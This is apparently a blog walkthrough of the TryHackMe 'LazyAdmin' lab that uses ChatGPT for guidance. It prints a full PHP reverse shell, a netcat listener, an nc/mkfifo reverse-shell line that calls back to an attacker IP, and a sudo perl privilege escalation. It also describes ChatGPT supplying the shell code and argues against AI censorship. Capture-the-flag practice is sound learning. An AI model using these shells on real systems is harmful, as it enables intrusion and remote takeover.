Beginners guide to AI in cybersec.

Hacking with
ChatGPT.
AI which stands for Artificial Intelligence has come a long way, since the era of the World Wide Web.
Today, we can see the integration of Artificial Intelligence into almost every technology. Whether it’s
your Google Assistant in the Androids, Alexa in Amazon Devices, or Siri in Apple Devices. There are
many other AI available on our day-to-day browsers. One of the major industries in AI is OpenAI,
which rolled out ChatGPT based on the latest GPT3.

OpenAI
OpenAI is an AI research and deployment company. Our mission is to ensure that
artificial general intelligence benefits…
openai.com

Made this with DALL.E 2 & Canva

It seems obvious to me that well-informed people, security researchers, and hackers in today’s world
must find vulnerabilities in artificial intelligence that can be prevented before being exploited by an
attacker and work on patching them up before they are exploited. Without even being connected to the
huge database of modern internet and communication systems, AI-based search engines such as
ChatGPT are already far more advanced than any other browser on the market that is connected to
those systems.

Let’s talk about ChatGPT and how it helps us in hacking a

machine.
Let’s try to hack a machine on tryhackme using chatGPT as my search engine, I will show you exactly
how it will help us, even if I know nothing about hacking.

ChatGPT: Optimizing Language Models for Dialogue

We've trained a model called ChatGPT which interacts in a conversational way.
The dialogue format makes it possible for…
openai.com
This here is the machine we are going to hack into. It’s an easy linux machine called “Lazy Admin”.
Let’s start!

TryHackMe | LazyAdmin
Easy linux machine to practice your skills
tryhackme.com
Since, I am assuming that I know only basics of hacking, let’s ask ChatGPT how to get started and
what should be our first step.

It suggests, we should gather information about our target and find it’s vulnerabilities by performing a
network scan, so let’s do that. It even suggests the name of tool that we should use called nmap. Now,
we should also ask ChatGPT for our Nmap scan syntax that we will perform in our Linux terminal.
Here is the IP address of the target, we are trying to hack into.

I modified the syntax a little bit only to make it go faster! HERE IS THE RESULT OF THE SCAN:
Port 22 and 80 are open so let’s go to the port 80 webserver.
It seems that Apache2 is running on port 80.

No worries let’s ask ChatGPT for assistance. Since, it’s a web-server, I am gonna ask for fuzzing this
website to discover the secrets.
There we go, let’s do this! Looks like we got something already.
This is the site, that we got.
/content (Status: 301) [Size: 316] [--> http://10.10.117.255/content/]

It’s a CMS website. So,let’s run GoBuster again.

Again I discovered a lot of directory inside this directory and In one of them I found this:

I looked for My SQL backup directory and go this .SQL file, inside I found the password hash.

Now, let’s ask ChatGPT, about what should we do with the password hash.
Let’s do what it says. Let’s perform a hash cracking online using a platform called CrackStation. Here
is the link:
CrackStation - Online Password Hash Cracking - MD5, SHA1,
Linux, Rainbow Tables, etc.
Enter up to 20 non-salted hashes, one per line: Supports: LM, NTLM, md2, md4,
md5, md5(md5_hex), md5-half, sha1…
crackstation.net

There we go, it cracked the password here it is:

Password123

I logged the into a website using our credential, that we got.

username: manager
password: Password123
In the Ads section, we can add a script to get a reverse connection I have downloaded a Php reverse
shell script. So, let’s asl ChatGPT for the php reverse shell script.
Here is the code, it gave me, you can use this or you can also try a code by pentest monkey. Below is
the code from pentest monkey!
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.35'; // You have changed this
$port = 4420; // And this
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();

if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}

if ($pid) {
exit(0); // Parent exits
}
 // Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they
won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
 if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string
";
}
}
?>

Let’s copy and paste this onto Ads section and create a file. Don’t forget to change the IP and port. Set
your tun0 IP and change the Port to 9001.

It should look like this:

After pressing done, It should look like this on the directory listing.

Now we have to create a listener in our device, where we can receive the connection back.
nc -lvnp 9001
As soon as you click on revshell.php on the webserver, a connection will be established here! Boom, I
got the shell!

I went to home directory asap and read the flag.txt

Copy paste this here and half of this machine will be considered hacked.

Next, we need to do privilege escalation and get the root flag. Enter the following command, and we
will get the root access.
python3 -c 'import pty;pty.spawn("/bin/bash")'

Next up, enter this, again change it to your tun0 IP.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.39.120 443
>//tmp/f" > /etc/copy.sh

Now, start another listener on port 443, like this:

And, then at last, the final command, execute this and you will get the root terminal.
sudo perl /home/itguy/backup.pl

Copy paste the flag and boom! The machine is successfully hacked!
This is going to be one of the first article, that has covered how to hack a machine using ChatGPT. I
would do some more articles on ChatGPT and other AI programs in the near future. It is quite
clear that the modern advancements in AI has a lot of perks, but it can also be used for malicious
activity. Programmers and developers are censoring these programs to stop these malicious activities.

Censorship in AI programs.
As for my personal opinion, I don’t support censoring of the internet or any technology for that
matter. Censoring technology has never brought down the criminal activities, and I don’t think it ever
will. Advancement in tech is inevitable. You can’t stop or manipulate it.
Here is a poem, that I asked ChatGPT to write for me on “Darkness in hackers”. Hope you’ll like
it.
Be safe, be secure and happy hacking :)